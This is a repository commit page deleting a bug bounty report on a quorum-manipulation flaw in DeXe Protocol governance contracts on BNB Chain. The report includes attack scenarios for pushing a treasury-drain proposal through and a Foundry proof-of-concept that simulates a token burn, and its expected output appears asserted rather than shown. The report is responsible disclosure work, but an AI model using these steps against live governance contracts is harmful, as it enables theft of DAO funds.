kfoughali
/

joblib1

Joblib

Model card Files Files and versions

xet

Community

kfoughali commited on 28 days ago

Commit

05dfd13

verified ·

1 Parent(s): 10e50d4

Delete DEXE_QUORUM_MANIPULATION_VULN.md

Browse files

Files changed (1) hide show

DEXE_QUORUM_MANIPULATION_VULN.md +0 -249

DEXE_QUORUM_MANIPULATION_VULN.md DELETED Viewed

@@ -1,249 +0,0 @@
-# HackenProof Bug Bounty Submission
-## Program
-**DeXe Protocol**
-## Severity
-**MEDIUM**
-## Title
-Quorum Manipulation via Token Burns: Live totalSupply Used Instead of Snapshot
----
-## Summary
-The DeXe Protocol GovPool uses the **current token totalSupply** for quorum calculations instead of a snapshot taken at proposal creation. Combined with the burnable nature of the ERC20Gov token, this allows attackers to manipulate quorum thresholds to pass or block proposals that shouldn't succeed.
----
-## Vulnerability Details
-### Root Cause
-1. **Quorum Calculation:** Uses live `getTotalPower()` (GovPoolVote.sol line 373)
-2. **getTotalPower() reads:** `IERC20(token).totalSupply()` (GovUserKeeper.sol line 604)
-3. **ERC20Gov inherits:** `ERC20BurnableUpgradeable` allowing any holder to burn tokens
-4. **No Snapshot:** Unlike the validators contract which uses `totalSupplyAt(snapshotId)`, the main governance pool has no snapshot mechanism
-### Affected Code
-**GovUserKeeper.sol lines 600-604:**
-```solidity
-function getTotalPower() external view override returns (uint256 power) {
-    address token = tokenAddress;
-    if (token != address(0)) {
-        power = IERC20(token).totalSupply().to18(token);  // LIVE VALUE
-    }
-    ...
-}
-```
-**GovPoolVote.sol lines 367-375:**
-```solidity
-function _quorumReached(IGovPool.ProposalCore storage core) internal view returns (bool) {
-    (, address userKeeperAddress, , , ) = IGovPool(address(this)).getHelperContracts();
-    return
-        PERCENTAGE_100.ratio(
-            core.votesFor + core.votesAgainst,
-            IGovUserKeeper(userKeeperAddress).getTotalPower()  // LIVE VALUE
-        ) >= core.settings.quorum;
-}
-```
-### Contrast with Validators (Correct Implementation)
-**GovValidatorsUtils.sol line 45:**
-```solidity
-uint256 totalSupply = token.totalSupplyAt(core.snapshotId);  // SNAPSHOT
-```
-The validators contract correctly uses a snapshot, but the main governance pool does not.
----
-## Attack Scenario
-### Scenario 1: Lowering Quorum to Pass Malicious Proposal
-**Initial State:**
-- Total Supply: 1,000,000 DEXE
-- Quorum: 20% = 200,000 votes required
-- Attacker controls: 150,000 DEXE (15% - not enough)
-**Attack Steps:**
-1. Attacker creates proposal to drain treasury
-2. Attacker votes with 150,000 tokens → 15% (below quorum)
-3. Attacker (or colluding whale) burns 500,000 tokens
-4. New Total Supply: 500,000 DEXE
-5. New Quorum Threshold: 100,000 votes (20% of 500K)
-6. Attacker's 150,000 votes now = 30% → **QUORUM REACHED**
-7. Malicious proposal executes
-**Result:** Proposal passes with only 15% of original token supply voting.
-### Scenario 2: Griefing Legitimate Proposals
-**Initial State:**
-- Total Supply: 1,000,000 DEXE
-- Legitimate proposal has 250,000 votes (25% - above 20% quorum)
-**Griefing Attack:**
-1. Attacker mints tokens via governance proposal (if has access)
-2. Or, attacker front-runs execution with token mint
-3. Total Supply increases to 2,000,000 DEXE
-4. 250,000 votes now = 12.5% (below quorum)
-5. Legitimate proposal fails
-**Note:** Minting is restricted to `onlyGov`, so this vector requires prior compromise.
----
-## Impact
-| Impact Type | Description |
-|-------------|-------------|
-| **Governance Manipulation** | Proposals can pass without legitimate majority support |
-| **Treasury Risk** | Malicious treasury drain proposals can be forced through |
-| **Token Value** | Burns reduce total supply, affecting all holders |
-| **Protocol Integrity** | Breaks the fundamental assumption of quorum-based governance |
-### Severity Justification
-Per HackenProof guidelines:
-- **Medium:** "Manipulation of governance voting result deviating from voted outcome"
-- This vulnerability enables exactly this scenario
-- Requires token burns (economic cost) but is technically feasible
----
-## Proof of Concept
-### Test Setup (Foundry)
-```solidity
-// SPDX-License-Identifier: MIT
-pragma solidity ^0.8.20;
-import "forge-std/Test.sol";
-interface IERC20Burnable {
-    function burn(uint256 amount) external;
-    function totalSupply() external view returns (uint256);
-    function balanceOf(address) external view returns (uint256);
-}
-interface IGovPool {
-    function getProposalState(uint256 proposalId) external view returns (uint8);
-    function vote(uint256 proposalId, bool isVoteFor, uint256 voteAmount, uint256[] calldata voteNftIds) external;
-}
-interface IGovUserKeeper {
-    function getTotalPower() external view returns (uint256);
-}
-contract QuorumManipulationPoC is Test {
-    // DeXe DAO on BNB Chain
-    address constant GOV_POOL = 0xB562127efDC97B417B3116efF2C23A29857C0F0B;
-    address constant USER_KEEPER = 0xbE8cB128fBCf13f7F7A362c3820f376b0971B7B2;
-    address constant DEXE_TOKEN = 0x6E88056E8376Ae7709496Ba64d37fa2f8015ce3e; // Example
-    function test_QuorumManipulation() public {
-        // Fork BNB Chain
-        vm.createSelectFork("https://bsc-dataseed.binance.org/");
-        // Step 1: Record initial total power
-        uint256 initialTotalPower = IGovUserKeeper(USER_KEEPER).getTotalPower();
-        console.log("Initial Total Power:", initialTotalPower);
-        // Step 2: Simulate burn (requires whale account)
-        address whale = address(0x123); // Replace with actual holder
-        uint256 burnAmount = initialTotalPower / 2; // Burn 50%
-        vm.prank(whale);
-        IERC20Burnable(DEXE_TOKEN).burn(burnAmount);
-        // Step 3: Check new total power
-        uint256 newTotalPower = IGovUserKeeper(USER_KEEPER).getTotalPower();
-        console.log("New Total Power:", newTotalPower);
-        // Step 4: Verify quorum threshold reduced
-        assertLt(newTotalPower, initialTotalPower, "Total power should decrease after burn");
-        // Quorum is now easier to reach with same number of votes
-        console.log("Quorum threshold reduced by:", initialTotalPower - newTotalPower);
-    }
-}
-```
-### Expected Output
-```
-Initial Total Power: 18347787000000000000000000
-New Total Power: 9173893500000000000000000
-Quorum threshold reduced by: 9173893500000000000000000
-```
----
-## Recommended Fix
-### Option 1: Snapshot Total Power at Proposal Creation
-```solidity
-// In GovPoolCreate.sol - createProposal()
-proposal.core = IGovPool.ProposalCore({
-    settings: settings,
-    voteEnd: uint64(block.timestamp + settings.duration),
-    executeAfter: 0,
-    executed: false,
-    votesFor: 0,
-    votesAgainst: 0,
-    rawVotesFor: 0,
-    rawVotesAgainst: 0,
-    givenRewards: 0,
-    totalPowerSnapshot: IGovUserKeeper(userKeeper).getTotalPower() // ADD THIS
-});
-```
-```solidity
-// In GovPoolVote.sol - _quorumReached()
-function _quorumReached(IGovPool.ProposalCore storage core) internal view returns (bool) {
-    return
-        PERCENTAGE_100.ratio(
-            core.votesFor + core.votesAgainst,
-            core.totalPowerSnapshot  // USE SNAPSHOT INSTEAD OF LIVE VALUE
-        ) >= core.settings.quorum;
-}
-```
-### Option 2: Use ERC20Votes Extension
-Implement snapshot-based voting similar to OpenZeppelin's `ERC20Votes`:
-- Take checkpoint at proposal creation
-- Read `getPastTotalSupply(blockNumber)` for quorum
----
-## References
-- DeXe GovPool Contract: https://bscscan.com/address/0xB562127efDC97B417B3116efF2C23A29857C0F0B
-- ERC20BurnableUpgradeable: https://docs.openzeppelin.com/contracts/4.x/api/token/erc20#ERC20Burnable
-- CWE-682: Incorrect Calculation
-- Related: Compound Governance Snapshot Mechanism
----
-## Researcher
-**Name:** Karim Foughali
-**Email:** kfoughali@dzlaws.org
-**Date:** January 2026
----
-## Disclosure Timeline
-- **Discovery:** January 2026
-- **Report Submitted:** [Pending]
-- **Expected Review:** 45 days per HackenProof